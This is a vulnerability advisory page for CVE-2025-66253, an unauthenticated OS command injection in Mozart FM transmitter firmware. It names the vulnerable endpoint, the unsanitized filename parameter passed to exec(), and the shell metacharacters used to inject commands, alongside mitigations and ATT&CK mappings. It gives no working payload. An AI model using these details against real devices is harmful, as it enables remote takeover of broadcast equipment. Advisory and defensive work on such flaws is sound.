Cyber Posture

CVE-2025-66253

CriticalPublic PoC

Published: 26 November 2025

Published
26 November 2025
Modified
03 December 2025
KEV Added
Patch
CVSS Score 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.0055 68.2th percentile
Risk Priority 20 60% EPSS · 20% KEV · 20% CVSS

Description

Unauthenticated OS Command Injection (start_upgrade.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000 allows an attacker to perform User input passed directly to exec() allows remote code execution…

more

via start_upgrade.php. The `/var/tdf/start_upgrade.php` endpoint passes user-controlled `$_GET["filename"]` directly into `exec()` without sanitization or shell escaping. Attackers can inject arbitrary shell commands using metacharacters (`;`, `|`, etc.) to achieve remote code execution as the web server user (likely root).

Mitigating Controls (NIST 800-53 r5)AI

SI-10 Information Input Validation good match
prevent

Directly requires validation of the user-controlled $_GET["filename"] parameter at the input point before passing it to exec() to block injection of shell metacharacters.

SI-9 Information Input Restrictions good match
prevent

Restricts the filename input to safe, authorized values excluding shell metacharacters like ; or | to prevent OS command injection.

SI-2 Flaw Remediation good match
prevent

Mandates timely remediation of the command injection flaw in start_upgrade.php through identification, patching, and verification.

Security SummaryAI

CVE-2025-66253 is an unauthenticated OS command injection vulnerability in the start_upgrade.php script of DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter devices, affecting versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, and 7000. The issue stems from the /var/tdf/start_upgrade.php endpoint, which passes the user-controlled $_GET["filename"] parameter directly into the exec() PHP function without sanitization or shell escaping, enabling attackers to inject arbitrary commands.

An unauthenticated attacker with network access can exploit this vulnerability by sending a crafted GET request to the start_upgrade.php endpoint, injecting shell metacharacters such as ; or | into the filename parameter. Successful exploitation allows remote code execution as the web server user, likely root, granting high confidentiality, integrity, and availability impact. The vulnerability carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and maps to CWE-78 (OS Command Injection).

References for further details, including the vulnerability analysis, are provided at https://www.abdulmhsblog.com/posts/webfmvulns/. No vendor advisories or specific patch information are detailed in the CVE publication from 2025-11-26.

Details

CWE(s)
CWE-78

Affected Products

dbbroadcast
mozart next 100 firmware
all versions
dbbroadcast
mozart next 1000 firmware
all versions
dbbroadcast
mozart next 2000 firmware
all versions
dbbroadcast
mozart next 30 firmware
all versions
dbbroadcast
mozart next 300 firmware
all versions
dbbroadcast
mozart next 3000 firmware
all versions
dbbroadcast
mozart next 3500 firmware
all versions
dbbroadcast
mozart next 50 firmware
all versions
dbbroadcast
mozart next 500 firmware
all versions
dbbroadcast
mozart next 6000 firmware
all versions
+12 more product configuration(s) — see NVD for full list

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
attack.mitre.org →
T1059.004 Unix Shell Execution
Adversaries may abuse Unix shell commands and scripts for execution.
attack.mitre.org →
Why these techniques?

Unauthenticated OS command injection in a public-facing web endpoint (/var/tdf/start_upgrade.php) directly enables exploitation of public-facing applications (T1190) and execution of arbitrary Unix shell commands via PHP exec() (T1059.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

References